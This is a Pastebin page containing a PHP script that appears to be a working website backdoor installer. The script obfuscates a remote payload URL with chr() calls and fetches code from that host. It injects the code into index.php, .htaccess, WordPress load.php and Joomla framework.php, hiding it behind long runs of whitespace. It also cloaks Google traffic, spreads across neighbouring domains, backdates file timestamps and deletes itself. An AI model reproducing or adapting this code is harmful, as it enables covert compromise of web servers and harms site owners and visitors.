API tools faq
paste
Advertisement
PalmaSolutions

ax.php

PalmaSolutions
Apr 19th, 2019
288
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 13.37 KB | None | 0 0
raw download clone embed print report
  1. <?php error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); ini_set("log_errors", 0); ini_set("error_log", "/dev/null"); ignore_user_abort(true); $localpath=getenv("SCRIPT_NAME");$absolutepath=str_replace('\\', '/', getenv("SCRIPT_FILENAME"));$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $coder = fetch_url(chr(intval("104")).chr(intval("116")).chr(intval("116")).chr(intval("112")).chr(intval("58")).chr(intval("47")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("98")).chr(intval("111")).chr(intval("107")).chr(intval("111")).chr(intval("105")).chr(intval("110")).chr(intval("99")).chr(intval("104")).chr(intval("105")).chr(intval("110")).chr(intval("97")).chr(intval("46")).chr(intval("99")).chr(intval("111")).chr(intval("109")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("112")).chr(intval("104")).chr(intval("112")).chr(intval("63")).chr(intval("102")).chr(intval("105")).chr(intval("108")).chr(intval("101")).chr(intval("61")).chr(intval("99")).chr(intval("111")).chr(intval("100")).chr(intval("101")).chr(intval("114"))); if (!$coder) return false; $revolution = fetch_url(chr(intval("104")).chr(intval("116")).chr(intval("116")).chr(intval("112")).chr(intval("58")).chr(intval("47")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("98")).chr(intval("111")).chr(intval("107")).chr(intval("111")).chr(intval("105")).chr(intval("110")).chr(intval("99")).chr(intval("104")).chr(intval("105")).chr(intval("110")).chr(intval("97")).chr(intval("46")).chr(intval("99")).chr(intval("111")).chr(intval("109")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("112")).chr(intval("104")).chr(intval("112")).chr(intval("63")).chr(intval("102")).chr(intval("105")).chr(intval("108")).chr(intval("101")).chr(intval("61")).chr(intval("114")).chr(intval("101")).chr(intval("118")).chr(intval("111")).chr(intval("108")).chr(intval("117")).chr(intval("116")).chr(intval("105")).chr(intval("111")).chr(intval("110")).chr(intval("38")).chr(intval("117")).chr(intval("115")).chr(intval("101")).chr(intval("114")).chr(intval("110")).chr(intval("97")).chr(intval("109")).chr(intval("101")).chr(intval("61")).'bar'); if (!$revolution) return false; $include = fetch_url(chr(intval("104")).chr(intval("116")).chr(intval("116")).chr(intval("112")).chr(intval("58")).chr(intval("47")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("98")).chr(intval("111")).chr(intval("107")).chr(intval("111")).chr(intval("105")).chr(intval("110")).chr(intval("99")).chr(intval("104")).chr(intval("105")).chr(intval("110")).chr(intval("97")).chr(intval("46")).chr(intval("99")).chr(intval("111")).chr(intval("109")).chr(intval("47")).chr(intval("111")).chr(intval("98")).chr(intval("102")).chr(intval("46")).chr(intval("112")).chr(intval("104")).chr(intval("112")).chr(intval("63")).chr(intval("102")).chr(intval("105")).chr(intval("108")).chr(intval("101")).chr(intval("61")).chr(intval("105")).chr(intval("110")).chr(intval("99")).chr(intval("108")).chr(intval("117")).chr(intval("100")).chr(intval("101")).chr(intval("95")).chr(intval("114")).chr(intval("101")).chr(intval("118")).chr(intval("111")).chr(intval("108")).chr(intval("117")).chr(intval("116")).chr(intval("105")).chr(intval("111")).chr(intval("110"))); if (!$include) return false; $status = false; if (do_backdoor($root_path, null, $coder, $include, $revolution)) { $status = true; $domains = get_domains($root_path, $_SERVER['HTTP_HOST']); foreach ($domains as $domain_path) { $tmp = explode('/', $domain_path); $domain_name = (count($tmp) > 0)? $tmp[count($tmp) - 1]: ''; if (do_backdoor($domain_path, 'Success!', $coder, $include, $revolution)) { } if (do_backdoor($domain_path.'/httpdocs', 'Success!', $coder, $include, $revolution)) { } if (do_backdoor($domain_path.'/docs', 'Success!', $coder, $include, $revolution)) { } if (do_backdoor($domain_path.'/public_html', 'Success!', $coder, $include, $revolution)) { } if (do_backdoor($domain_path.'/html', 'Success!', $coder, $include, $revolution)) { } } } last_word($status? 'Success!': 'Failed!'); function do_backdoor($root_path, $status, $coder, $include, $revolution) { if (!is_dir($root_path)) return false; $htaccess_filename = substr(md5(substr(getenv("SERVER_ADDR"), 0, 4).".htaccess"), 0, 6).".php"; $htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} google [OR]\nRewriteCond %{HTTP_REFERER} google\nRewriteCond %{REQUEST_URI} !(\.js|\.css|\.png|\.jpg|\.jpeg|\.gif|\.svg|\.ttf|\.woff|\.eot)\nRewriteRule ^.*$ $htaccess_filename [L]\n</IfModule>\n\n"; $revolution = '<?php '.$revolution."\n"; if ( !file_exists($root_path.'/index.php') && !file_exists($root_path.'/.htaccess') ) return false; $cache_dir = $root_path; $parent_dir = $root_path; $dirs1 = glob($root_path."/*", constant("GLOB_ONLYDIR")); array_multisort(array_map("filemtime", $dirs1), constant("SORT_NUMERIC"), constant("SORT_ASC"), $dirs1); $subdir = substr(md5(substr(getenv("SERVER_ADDR"), intval("0"), intval("4"))."all_cache"), intval("0"), intval("4")); foreach ($dirs1 as $_dir) { if (is_writable($_dir)) { $dirs2 = glob($_dir."/*", constant("GLOB_ONLYDIR")); array_multisort(array_map("filemtime", $dirs2), constant("SORT_NUMERIC"), constant("SORT_ASC"), $dirs2); foreach ($dirs2 as $__dir) { if ((strpos($__dir, $subdir) === constant("false")) && is_writable($__dir)) { $parent_dir = $__dir; $cache_dir = $__dir; break; } } if ($cache_dir !== $root_path) break; } } $new_dir = $cache_dir."/".$subdir; if (!is_dir($new_dir)) { if (mkdir($new_dir)) { touch($new_dir."/", time() - mt_rand(intval("94608000"), intval("189216000"))); touch($cache_dir."/", time() - mt_rand(intval("315360000"), intval("473040000"))); touch($cache_dir."/../", time() - mt_rand(intval("315360000"), intval("473040000"))); } } if (is_writable($new_dir)) { $cache_dir = $new_dir; } $cache_dir = str_replace("\\", "/", $cache_dir); $revolution_path = $cache_dir."/".substr(md5(substr(getenv("SERVER_ADDR"), 0, 4)."revolution"), 0, 4); file_put_contents($revolution_path, $revolution); chmod(dirname($revolution_path), 0755); chmod($revolution_path, 0644); touch($revolution_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($revolution_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $index_path = $root_path.'/index.php'; chmod(dirname($index_path), 0755); chmod($index_path, 0644); $index_content_original = file_get_contents($index_path); if (!$index_content_original) $index_content_original = ''; $index_content_cleaned = preg_replace('#<\?php {100}.+? \?>#', '', $index_content_original); if (strpos($index_content_cleaned, 'Front to the WordPress application') !== false) { $index_content_cleaned = preg_replace('#.+?Front to the WordPress application#s', "<?php\n/**\n * Front to the WordPress application", $index_content_cleaned); } $spaces = '';$num=mt_rand(500,800);for($i=0;$i<$num;$i++){$spaces.=' ';} $include = '<?php'.$spaces.$coder.' '.$include.' ?>'; $index_content = $include.trim($index_content_cleaned)."\n"; file_put_contents($index_path, $index_content); chmod($index_path, 0644); touch($index_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($index_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $htaccess_filename_content = $include.'<?php @include_once("index.php"); ?>'; $htaccess_filename_path = $root_path."/".$htaccess_filename; file_put_contents($htaccess_filename_path, $htaccess_filename_content); chmod($htaccess_filename_path, 0644); touch($htaccess_filename_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_filename_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $htaccess_path = $root_path.'/.htaccess'; chmod(dirname($htaccess_path), 0755); chmod($htaccess_path, 0644); $htaccess_content_original = file_get_contents($htaccess_path); $old_htaccess = "<IfModule mod_rewrite.c>\nRewriteEngine On\nRewriteCond %{HTTP_USER_AGENT} google [OR]\nRewriteCond %{HTTP_REFERER} google\nRewriteRule ^.*$ index.php [L]\n</IfModule>"; $htaccess_content_original = str_replace(trim($old_htaccess), '', $htaccess_content_original); $htaccess_content_original = str_replace(str_replace("\n", "\r\n", trim($old_htaccess)), '', $htaccess_content_original); $htaccess_content_original = str_replace(trim($htaccess), '', $htaccess_content_original); $htaccess_content_original = str_replace(str_replace("\n", "\r\n", trim($htaccess)), '', $htaccess_content_original); $htaccess_content_original = preg_replace("/[\r\n]+/", "\n", $htaccess_content_original); $htaccess_content = $htaccess."\n".$htaccess_content_original; file_put_contents($htaccess_path, $htaccess_content); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); $index_html_path = $root_path.'/index.html'; $index_html = file_get_contents($index_html_path); if (file_exists($index_html_path)) unlink($index_html_path); $index_htm_path = $root_path.'/index.htm'; $index_htm = file_get_contents($index_htm_path); if (file_exists($index_htm_path)) unlink($index_htm_path); if ($status === null) { $status = fetch_url('http://'.$_SERVER['HTTP_HOST'].'/?page-test'); } if (strpos($status, 'Success!') === false) { unlink($htaccess_filename_path); if (!empty($htaccess_content_original)) { file_put_contents($htaccess_path, $htaccess_content_original); chmod($htaccess_path, 0644); touch($htaccess_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($htaccess_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); } else { @unlink($htaccess_path); } if (!empty($index_content_original)) { file_put_contents($index_path, $index_content_original); chmod($index_path, 0644); touch($index_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($index_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); } else { @unlink($index_path); } if ($index_html) { file_put_contents($index_html_path, $index_html); chmod($index_html_path, 0644); touch($index_html_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($index_html_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); } if ($index_htm) { file_put_contents($index_htm_path, $index_htm); chmod($index_htm_path, 0644); touch($index_htm_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($index_htm_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); } return false; } else { if (is_dir($root_path.'/wp-admin/includes/')) { $load_path = $root_path.'/wp-includes/load.php'; chmod(dirname($load_path), 0755); chmod($load_path, 0644); $load_content = file_get_contents($load_path); $load_content = preg_replace('# {100}.+#', '', $load_content); $funcs = array('wp_unregister_GLOBALS', 'wp_fix_server_vars', 'wp_check_php_mysql_versions', 'wp_favicon_request', 'wp_maintenance', 'timer_start', 'timer_stop', 'wp_debug_mode', 'wp_set_lang_dir', 'require_wp_db', 'wp_set_wpdb_vars', 'wp_start_object_cache', 'wp_not_installed', 'wp_get_mu_plugins', 'wp_get_active_and_valid_plugins', 'wp_set_internal_encoding', 'wp_magic_quotes', 'shutdown_action_hook', 'wp_clone', 'is_admin', 'is_blog_admin', 'is_network_admin', 'is_user_admin', 'is_multisite', 'get_current_blog_id', 'is_wp_error'); $func = $funcs[mt_rand(0, count($funcs) - 1)]; $load_content = str_replace("\nfunction $func", $spaces.$coder."\nfunction $func", $load_content); file_put_contents($load_path, $load_content); chmod($load_path, 0644); touch($load_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($load_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); return true; } if (is_dir($root_path.'/libraries/joomla/application/')) { $framework_path = $root_path.'/includes/framework.php'; chmod(dirname($framework_path), 0755); chmod($framework_path, 0644); $framework_content = file_get_contents($framework_path); $framework_content = preg_replace('#<\?php {100}.+? \?>#', '', $framework_content); $framework_content = '<?php'.$spaces.$coder." ?>".$framework_content; file_put_contents($framework_path, $framework_content); chmod($framework_path, 0644); touch($framework_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($framework_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); return true; } return true; } } function last_word($string) { unlink(__FILE__); die($string); } function get_domains($root_path, $exclude_domain) { $domains = array(); foreach (@glob($root_path.'/../*', GLOB_ONLYDIR) as $dir) { $domains[] = str_replace('\\', '/', $dir); } foreach (@glob($root_path.'/../../*', GLOB_ONLYDIR) as $dir) { $domains[] = str_replace('\\', '/', $dir); } foreach (@glob($root_path.'/*', GLOB_ONLYDIR) as $dir) { $domains[] = str_replace('\\', '/', $dir); } return $domains; } function fetch_url($url) { $contents = false; $errs = 0; while ( !$contents && ($errs++ < 3) ) { $user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 googlebot'; if (extension_loaded('curl') && function_exists('curl_init')) { $c = curl_init($url); curl_setopt($c, CURLOPT_FOLLOWLOCATION, TRUE); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); curl_setopt($c, CURLOPT_USERAGENT,$user_agent); $contents = curl_exec($c); if (curl_getinfo($c, CURLINFO_HTTP_CODE) !== 200) $contents = false; curl_close($c); } else { $options = array('http' => array('user_agent' => $user_agent)); $context = stream_context_create($options); $contents = @file_get_contents($url, false, $context); } } return $contents; } ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!